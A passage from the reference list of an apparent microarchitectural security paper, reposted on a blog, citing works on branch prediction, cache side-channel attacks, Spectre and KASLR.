[18] JIM´E NEZ, D. A., AND LIN, C. Dynamic branch prediction with perceptrons. In High-Performance Computer Architecture, 2001. HPCA. The Seventh International Symposium on (2001), IEEE, pp. 197–206.
[19] KOCHER, P., GENKIN, D., GRUSS, D., HAAS, W., HAMBURG, M., LIPP, M., MANGARD, S., PRESCHER, T., SCHWARZ, M., AND YAROM, Y. Spectre Attacks: Exploiting Speculative Execution.
[20] KOCHER, P. C. Timing Attacks on Implementations of Diffe- Hellman, RSA, DSS, and Other Systems. In CRYPTO (1996).
[21] LEE, B., MALISHEVSKY, A., BECK, D., SCHMID, A., AND LANDRY, E. Dynamic branch prediction. Oregon State University.
[22] LEVIN, J. Mac OS X and IOS Internals: To the Apple’s Core John Wiley & Sons, 2012.
[23] LIPP, M., GRUSS, D., SPREITZER, R., MAURICE, C., AND MANGARD, S. ARMageddon: Cache Attacks on Mobile Devices. In USENIX Security Symposium (2016).
[24] LIU, F., YAROM, Y., GE, Q., HEISER, G., AND LEE, R. B. Last-Level Cache Side-Channel Attacks are Practical. In IEEE Symposium on Security and Privacy – SP (2015), IEEE Computer Society, pp. 605–622.
[25] LWN. The current state of kernel page-table isolation, Dec. 2017.
[26] MAURICE, C., WEBER, M., SCHWARZ, M., GINER, L., GRUSS, D., ALBERTO BOANO, C., MANGARD, S., AND R¨OMER, K. Hello from the Other Side: SSH over Robust Cache Covert Channels in the Cloud. In NDSS (2017).
[27] MOLNAR, I. x86: Enable KASLR by default, 2017.
[28] OSVIK, D. A., SHAMIR, A., AND TROMER, E. Cache Attacks and Countermeasures: the Case of AES. In CT-RSA (2006).
[29] PERCIVAL, C. Cache missing for fun and profit. In Proceedings of BSDCan (2005).
[30] PHORONIX. Linux 4.12 To Enable KASLR By Default, 2017.
[31] SCHWARZ, M., LIPP, M., GRUSS, D., WEISER, S., MAURICE, C., SPREITZER, R., AND MANGARD, S. KeyDrown: Eliminating Software-Based Keystroke Timing Side-Channel Attacks. In NDSS’18 (2018).
[32] TERAN, E., WANG, Z., AND JIM´ENEZ, D. A. Perceptron learning for reuse prediction. In Microarchitecture (MICRO), 2016 49th Annual IEEE/ACM International Symposium on (2016), IEEE, pp. 1–12.
[33] TOMASULO, R. M. An efficient algorithm for exploiting multiple arithmetic units. IBM Journal of research and Development 11, 1 (1967), 25–33.
[34] VINTAN, L. N., AND IRIDON, M. Towards a high performance neural branch predictor. In Neural Networks, 1999. IJCNN’99. International Joint Conference on (1999), vol. 2, IEEE, pp. 868–873.
[35] YAROM, Y., AND FALKNER, K. Flush+Reload: a High Resolution, Low Noise, L3 Cache Side-Channel Attack. In USENIX Security Symposium (2014).
[36] YEH, T.-Y., AND PATT, Y. N. Two-level adaptive training branch prediction. In Proceedings of the 24th annual international symposium on Microarchitecture (1991), ACM, pp. 51–61.
[37] ZHANG, Y., JUELS, A., REITER, M. K., AND RISTENPART, T. Cross-Tenant Side-Channel Attacks in PaaS Clouds. In CCS’14 (2014).

Guess you like

Origin blog.csdn.net/zheng_zmy/article/details/103479066